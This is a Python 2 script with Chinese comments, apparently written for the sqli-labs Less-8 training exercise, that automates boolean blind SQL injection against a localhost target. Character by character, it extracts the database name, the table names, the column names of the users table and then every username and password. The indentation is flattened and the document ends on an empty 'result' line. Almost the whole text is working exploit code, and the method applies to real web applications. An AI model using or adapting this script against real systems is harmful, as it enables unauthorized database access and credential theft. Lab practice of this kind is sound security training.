sql-labs Less8 盲注
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
#数据库长度
import time
url = "http://localhost/sqli-labs-master/Less-8"
# 0' or length(database())=8 --+
len = -1
for i in range(1,100):
param = "0' or length(database())=" + str(i) + "#"
res = requests.get(url,{'id':param})
# if 'You are in' in res.text:
# print '数据库长度为 %d' % i
# break
if res.content.decode('utf-8').find('You are in') != -1: #返回结果为-1,但在布尔中应该判断成了true,只要不等于0
print '数据库长度为 %d' % i
len = i
break
#数据库名
arr = [] #ascii表里所有字符
arr.append('')
for i in range(33, 127):
arr.append(chr(i))
database = ''
for j in range(1,len+1):
for i in arr:
param = "0' or (mid((database()) from(" + str(j) + ") for(1)))='" + i + "'#"
res = requests.get(url, {'id': param})
# print res.url,i
# print res.url
if 'You are in' in res.text:
database = database + str(i).lower()
# print database
break
print '数据库名为:%s' % database
#表个数
tableCnt = -1
for i in range(1,100):
param = "0' or (select count(table_name) as c from information_schema.tables where table_schema = database()) =" + str(i) + "#"
res = requests.get(url, {'id': param})
if 'You are in' in res.text:
tableCnt = i
break
print '表个数为:%d' % tableCnt
#表名称
tables = []
for i in range(0,tableCnt):
table_name = ''
isOk = False
for j in range(1,100):
for q in arr:
if not isOk:
param = "0' or (mid((select table_name as c from information_schema.tables " \
"where table_schema = database() limit %d,1) from(%d) for(1)))='%s' #" % (i, j, q)
res = requests.get(url, {'id': param})
# print i, j, q
if 'You are in' in res.text:
if q == '':
isOk = True
break
else :
table_name = table_name + str(q).lower()
# print table_name
break
tables.append(table_name)
print '表名称:%s' % tables
#字段个数 user为例
columnCnt = -1
for i in range(1,100):
param = "0' or (select count(column_name) as c from information_schema.columns where table_schema = database() and table_name = 'users') =" + str(i) + "#"
res = requests.get(url, {'id': param})
if 'You are in' in res.text:
columnCnt = i
break
print '字段个数为:%d' % columnCnt
#字段名称
columns = []
for i in range(0,columnCnt):
column_name = ''
isOk = False
for j in range(1,100):
for q in arr:
if not isOk:
param = "0' or (mid((select column_name as c from information_schema.columns " \
"where table_schema = database() and table_name = 'users' limit %d,1) from(%d) for(1)))='%s' #" % (i, j, q)
res = requests.get(url, {'id': param})
# print i, j, q
if 'You are in' in res.text:
if q == '':
isOk = True
break
else :
column_name = column_name + str(q).lower()
# print column_name
break
columns.append(column_name)
print '字段名称:%s' % columns
time.sleep(5)
#数据
data = ''
isOk = False
for i in range(1,1000):
for j in arr:
if not isOk:
param = "0' or (mid((select GROUP_CONCAT(id,username,password) from users) from(%d) for(1)))='%s' #" % (i, j)
res = requests.get(url, {'id' : param})
if 'You are in' in res.text:
if j == '':
isOk = True
break
else:
data = data + str(j).lower()
# print data
break
data = data.split(',')
print '数据为:%s' % data
结果: